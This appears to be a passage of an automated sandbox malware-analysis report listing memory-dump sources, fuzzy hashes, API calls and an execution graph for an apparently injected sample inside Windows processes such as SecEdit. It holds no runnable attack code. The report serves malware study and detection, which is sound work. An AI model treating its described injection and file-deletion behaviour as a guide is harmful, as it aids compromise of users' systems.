                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8221d7c39a162196edbc622dafc472084ca26f75271d1126e642c0fd372fe15c
                                                            • Instruction ID: cacb834b6917f752b71615db465f01ecd9a5fa6322db634618e7f316cd356fef
                                                            • Opcode Fuzzy Hash: 8221d7c39a162196edbc622dafc472084ca26f75271d1126e642c0fd372fe15c
                                                            • Instruction Fuzzy Hash: 1690023520140802D510B5585809646004687D0301F95D521A0424658E87948DA1A121
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c7cc297991045fb9594c95bc29b5238394510d23f535198d070a95a9288027e
                                                            • Instruction ID: b52060ead1f4ff308b269d5c3ebeda77a7585aa1dee75ed8366d731772b84f62
                                                            • Opcode Fuzzy Hash: 6c7cc297991045fb9594c95bc29b5238394510d23f535198d070a95a9288027e
                                                            • Instruction Fuzzy Hash: 3A90022130140403D140B558541D6064005D7E1301F95D121E0414654DDA558D565222
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 355fdff07c7e3ffd9305178796f4006cf8245a9382915a36ee3cdb141ab9298c
                                                            • Instruction ID: 7b5e628ab6e2284f5b024e06e31468901166fbc6145edbfe77c4f1047c1e8ecd
                                                            • Opcode Fuzzy Hash: 355fdff07c7e3ffd9305178796f4006cf8245a9382915a36ee3cdb141ab9298c
                                                            • Instruction Fuzzy Hash: D190022120544842D100B958540DA06000587D0205F95D121A1064695EC7758D51A131
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 81fbdece5530b8734e10e1a1decd90b24fb705c88aac132fdb08ba58e6301238
                                                            • Instruction ID: 15519958592867abb5b91d902920f4e3b815471e093943ec677628d1e6e6a361
                                                            • Opcode Fuzzy Hash: 81fbdece5530b8734e10e1a1decd90b24fb705c88aac132fdb08ba58e6301238
                                                            • Instruction Fuzzy Hash: 6D90022921340402D180B558540D60A000587D1202FD5D525A0015658DCA558D695321
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2be1d778a89f85b951468016067fa11f106e392591a6cc92d7a4df38b08735e2
                                                            • Instruction ID: 3e5a1aa68cb5913feb75845e4eba1a511b6e951272c9e35a5fe6d55ad6514d5b
                                                            • Opcode Fuzzy Hash: 2be1d778a89f85b951468016067fa11f106e392591a6cc92d7a4df38b08735e2
                                                            • Instruction Fuzzy Hash: 61900231202405429540B6585809A4E410587E1302BD5D525A0015654DCA548D615221
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4aaa9756659e483f834df9aae0a0c2917beb578135876263270041bb131732ee
                                                            • Instruction ID: 3d74853d1caf42b1dfe73d3297af56bb80e0eba177af568d4dbb467faf8d3ff1
                                                            • Opcode Fuzzy Hash: 4aaa9756659e483f834df9aae0a0c2917beb578135876263270041bb131732ee
                                                            • Instruction Fuzzy Hash: 36900221242445525545F5584409507400697E02417D5C122A1414A50D86669D56D621
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            Strings
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03694742
                                                            • Execute=1, xrefs: 03694713
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03694725
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03694655
                                                            • ExecuteOptions, xrefs: 036946A0
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03694787
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036946FC
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 0369031E
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036902BD
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036902E7
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 03697B8E
                                                            • RTL: Re-Waiting, xrefs: 03697BAC
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03697B7F
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0369728C
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 036972A3
                                                            • RTL: Re-Waiting, xrefs: 036972C1
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03697294
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            APIs
                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 036ACFBD
                                                            Strings
                                                            Similarity
                                                            • API ID: CallFilterFunc@8
                                                            • String ID: @$@4rw@4rw

                                                            Execution Graph

                                                            Execution Coverage:3.2%
                                                            Dynamic/Decrypted Code Coverage:4.5%
                                                            Signature Coverage:1.4%
                                                            Total number of Nodes:507
                                                            Total number of Limit Nodes:78
80695->80680 80697 5897e6 80696->80697 80700 58d1c0 80697->80700 80699 5898ec 80699->80684 80701 58d1e4 80700->80701 80702 58d27c 80701->80702 80703 599d30 RtlFreeHeap 80701->80703 80702->80699 80703->80702 80704 58ed60 80705 58edc4 80704->80705 80706 585d70 2 API calls 80705->80706 80708 58eeed 80706->80708 80707 58eef4 80708->80707 80709 585e80 LdrInitializeThunk 80708->80709 80710 58ef70 80709->80710 80711 58f093 80710->80711 80712 595bb0 RtlFreeHeap 80710->80712 80713 58ef8d 80712->80713 80714 58f0a2 80713->80714 80735 58eb40 80713->80735 80715 597e60 NtClose 80714->80715 80717 58f0ac 80715->80717 80718 58efa5 80718->80714 80719 58efb0 80718->80719 80720 599e10 RtlAllocateHeap 80719->80720 80721 58efd9 80720->80721 80722 58eff8 80721->80722 80723 58efe2 80721->80723 80744 58ea30 CoInitialize 80722->80744 80724 597e60 NtClose 80723->80724 80726 58efec 80724->80726 80727 58f006 80728 597930 LdrInitializeThunk 80727->80728 80733 58f024 80728->80733 80729 58f082 80730 597e60 NtClose 80729->80730 80731 58f08c 80730->80731 80732 599d30 RtlFreeHeap 80731->80732 80732->80711 80733->80729 80734 597930 LdrInitializeThunk 80733->80734 80734->80733 80736 58eb5c 80735->80736 80737 584270 LdrLoadDll 80736->80737 80739 58eb7a 80737->80739 80738 58eb83 80738->80718 80739->80738 80740 584270 LdrLoadDll 80739->80740 80741 58ec4e 80740->80741 80742 584270 LdrLoadDll 80741->80742 80743 58ecab 80741->80743 80742->80743 80743->80718 80746 58ea95 80744->80746 80745 58eb2b CoUninitialize 80745->80727 80746->80745 80821 586820 80822 58684a 80821->80822 80825 587770 80822->80825 80824 586870 80826 58778d 80825->80826 80832 5975b0 80826->80832 80828 5877dd 80829 5877e4 80828->80829 80830 597690 LdrInitializeThunk 80828->80830 80829->80824 80831 58780d 80830->80831 80831->80824 80833 597643 80832->80833 80835 5975d7 80832->80835 80837 3012f30 LdrInitializeThunk 80833->80837 80834 59767c 80834->80828 80835->80828 80837->80834 80838 589420 80840 589427 80838->80840 80839 589448 80840->80838 
80840->80839 80841 599d30 RtlFreeHeap 80840->80841 80841->80839 80842 594e20 80843 594e7a 80842->80843 80845 594e87 80843->80845 80846 5929a0 80843->80846 80847 599cb0 NtAllocateVirtualMemory 80846->80847 80848 5929e1 80847->80848 80849 584270 LdrLoadDll 80848->80849 80852 592ae6 80848->80852 80851 592a27 80849->80851 80850 592a60 Sleep 80850->80851 80851->80850 80851->80852 80852->80845
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0058BD64
                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0058BD9F
                                                            • FindClose.KERNELBASE(?), ref: 0058BDAA
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 671a163cd6cc6b72c0805cde6b562972d3c602ec384ff662d5b02908a5cad152
                                                            • Instruction ID: ed1892a6aa53b298b306af0962c4f2c4e81e63aeba5ef107a70c5a7d9fcad620
                                                            • Opcode Fuzzy Hash: 671a163cd6cc6b72c0805cde6b562972d3c602ec384ff662d5b02908a5cad152
                                                            • Instruction Fuzzy Hash: 043185B16007497BEB60EB64CC89FEF7B7CEF84744F144458B908A7181DB71AA848BA4
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792488834.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2df0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: MemoryReadVirtual
                                                            • String ID: Xo)
                                                            • API String ID: 2834387570-431647615
                                                            • Opcode ID: be9f294a03c1c198172525ee50bb0d357ea71fedc6d95d6f313a903f28f11b64
                                                            • Instruction ID: 10c5abb8ed19a88b5695388a7810dc9b1f0d29aeeb4917fc083368fc6a75871d
                                                            • Opcode Fuzzy Hash: be9f294a03c1c198172525ee50bb0d357ea71fedc6d95d6f313a903f28f11b64
                                                            • Instruction Fuzzy Hash: EC51F33751428D4FC712CF7894552DABFA1EB427287A4479FC6D28B3A6C3114813D7D8
                                                            APIs
                                                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00597C63
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 92ef33578ea23af972abc873a34a61d42a2a83145ad60282d5ba439591b58ce9
                                                            • Instruction ID: 9ca626b2cd15f589eaa9336562c2e8e4ef2a143666eca89e4a0731aba091d524
                                                            • Opcode Fuzzy Hash: 92ef33578ea23af972abc873a34a61d42a2a83145ad60282d5ba439591b58ce9
                                                            • Instruction Fuzzy Hash: 3A31A7B5A11609AFCB14DF99D885EDFB7F9BF8C314F108219F918A3240D770A911CBA5
                                                            APIs
                                                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00597DAB
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 68dfbbb4a08441dab3b8eec8ecae1e870b0c481ef36d17217bc50f78a852324c
                                                            • Instruction ID: 93beaba88dac1656d699cb46124bfdf2d530c85791f8ec9d9cbfcc960313345d
                                                            • Opcode Fuzzy Hash: 68dfbbb4a08441dab3b8eec8ecae1e870b0c481ef36d17217bc50f78a852324c
                                                            • Instruction Fuzzy Hash: F331D7B5A00609AFCB14DF59D885EEFB7B9EF8C314F108209F918A7240D770A911CBA5
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(005817DE,?,?,00000000,00000004,00003000,?,?,?,?,?,?,005817DE,?,00590621,?), ref: 0059806D
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: 67c0c5d1f46d2c296b83bf2eac31f1da16e54ecb1cdd1814f46c9d8746362209
                                                            • Instruction ID: 015d9e1c4aa93d22dc6ed7a16933202ebb5b5ea59e1362d8e49cd71c0f9ca079
                                                            • Opcode Fuzzy Hash: 67c0c5d1f46d2c296b83bf2eac31f1da16e54ecb1cdd1814f46c9d8746362209
                                                            • Instruction Fuzzy Hash: D32117B5A01609ABDB14DF68DC45EABB7A9EF89314F00810AF918A7280D770A811CBA5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: da283a3833e2ac03665296ccba12cf12f768adfe4f4f10f9b86e9e2bc1e17b65
                                                            • Instruction ID: 28b1bb10ee1c721e87499c035ac5969f3dbef620500cea40f1b69d962d34ecb9
                                                            • Opcode Fuzzy Hash: da283a3833e2ac03665296ccba12cf12f768adfe4f4f10f9b86e9e2bc1e17b65
                                                            • Instruction Fuzzy Hash: 7201AD726116087FDB20EA68EC4AFAB77ADEFC5314F00814AFA1897181DBB07910C7E5
                                                            APIs
                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00597E94
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: a095f2cc110330fb65e3db0d0815f16563e75411f895d3cd10f7a49718a19118
                                                            • Instruction ID: d28eca334ce0c7490684c6eebf33ec79aa58b03be83688edff9ca130de26ddfc
                                                            • Opcode Fuzzy Hash: a095f2cc110330fb65e3db0d0815f16563e75411f895d3cd10f7a49718a19118
                                                            • Instruction Fuzzy Hash: 85E08C362002047BCA20EA69DC45FDF7B6DEFC6764F008015FA0CA7242CAB1B90187F4
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1cac1dd8a093f6c8620378d7b479240bd56b7a875d327bcd02d8373091cbf663
                                                            • Instruction ID: b0bc45c475209bb80179f2e525c4ff6c7900dba3b15eba01b9549ac20d37209b
                                                            • Opcode Fuzzy Hash: 1cac1dd8a093f6c8620378d7b479240bd56b7a875d327bcd02d8373091cbf663
                                                            • Instruction Fuzzy Hash: 1F90023560681412A140B1588885546444597E0301B56C012E0424554C8F148A565361
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6df5301fb96dd2c857a07ae5f2b89b18c26b912f342771c66a1381bc0b65e153
                                                            • Instruction ID: 66b4011c45073a67baf204b65308f192e4857e5cdd01ca23de7a5d6ddb15f7b2
                                                            • Opcode Fuzzy Hash: 6df5301fb96dd2c857a07ae5f2b89b18c26b912f342771c66a1381bc0b65e153
                                                            • Instruction Fuzzy Hash: 5F90022524241C02E140B158C4157070446C7D0601F56C012A0024554D8B168A6567B1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f4428e112fd45fdf637b8cbb387a778a0c03fb74a99542f02ad3c6f6f80cb1c0
                                                            • Instruction ID: 6b931265410d8dbabc0688631be3f06c1cc0bf116fc6d877de19b2dadb8c15fe
                                                            • Opcode Fuzzy Hash: f4428e112fd45fdf637b8cbb387a778a0c03fb74a99542f02ad3c6f6f80cb1c0
                                                            • Instruction Fuzzy Hash: 6F900265602514425140B1588805406644597E1301396C116A0554560C8B1889559369
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 49cbe0991a5376de7ce1b3eab084db98c8edf5426d17b93a14b122fb49f575b4
                                                            • Instruction ID: 076f0a4a11df75ca0f4d477af31348e5b6ff1bf54b921dde1e66c5b1302deb4a
                                                            • Opcode Fuzzy Hash: 49cbe0991a5376de7ce1b3eab084db98c8edf5426d17b93a14b122fb49f575b4
                                                            • Instruction Fuzzy Hash: BD90023560651802E100B1588515706144587D0201F66C412A0424568D8B958A5166A2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: d1bf321b21c93857407dec1b9523e1c241a51c8c0e3284aa362105b09f603272
                                                            • Instruction ID: 4c43af6a9ef6e19cfa5a0cf6ce68960489fec1709e2b2b8891301e167da3d711
                                                            • Opcode Fuzzy Hash: d1bf321b21c93857407dec1b9523e1c241a51c8c0e3284aa362105b09f603272
                                                            • Instruction Fuzzy Hash: FD900265203414035105B1588415616444A87E0201B56C022E1014590DCA2589916225
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 94c8bcce6afcf74119d68a7a66c9649528e50dd1f2c36a66e68f6254d0fc8215
                                                            • Instruction ID: 9ccce081879dbf0fa395f32013408c58ba4b5e9e020c778777095a50b2f6145a
                                                            • Opcode Fuzzy Hash: 94c8bcce6afcf74119d68a7a66c9649528e50dd1f2c36a66e68f6254d0fc8215
                                                            • Instruction Fuzzy Hash: BD90023560641C02E150B1588415746044587D0301F56C012A0024654D8B558B5577A1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 237bc40b6acd3db41e55b0d38e25ef24f0809f0802a98176457db290909f8f06
                                                            • Instruction ID: 505076fcfaeaeaa57dfca8a095dcfd8469f201051c3ba8c1fd4cf398c24d7664
                                                            • Opcode Fuzzy Hash: 237bc40b6acd3db41e55b0d38e25ef24f0809f0802a98176457db290909f8f06
                                                            • Instruction Fuzzy Hash: 5090023520645C42E140B1588405A46045587D0305F56C012A0064694D9B258E55B761
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c739b042b350850b4818b4fed63b671b14cb4d835119700fb9fc0e63b6625a80
                                                            • Instruction ID: a80387c5a22e31ff354a788b513f612407f17900879e40aae3f6370feacc8b62
                                                            • Opcode Fuzzy Hash: c739b042b350850b4818b4fed63b671b14cb4d835119700fb9fc0e63b6625a80
                                                            • Instruction Fuzzy Hash: 7490023520241C02E180B158840564A044587D1301F96C016A0025654DCF158B5977A1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ff73fc0b7103714728f8a4dd9fe519b06355064131b4ef16eee62cc8548d60a2
                                                            • Instruction ID: dc231f726ee10e785d56c8c7d0c6a2a9aa2e1f738f89c0a952809d1d140243a6
                                                            • Opcode Fuzzy Hash: ff73fc0b7103714728f8a4dd9fe519b06355064131b4ef16eee62cc8548d60a2
                                                            • Instruction Fuzzy Hash: 90900229212414031105F5584705507048687D5351356C022F1015550CDB2189615221
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4f0a65c068645740428e9fe786b3d84de79e4e0234d609b7cbeb5f57e3d876d1
                                                            • Instruction ID: 3a5360fd78e5c988a99093596c9a929a5fda2c7faa00fe88b204e0de453f3f53
                                                            • Opcode Fuzzy Hash: 4f0a65c068645740428e9fe786b3d84de79e4e0234d609b7cbeb5f57e3d876d1
                                                            • Instruction Fuzzy Hash: B2900229222414021145F558460550B088597D6351396C016F1416590CCB2189655321
                                                            APIs
                                                            Memory Dump Source
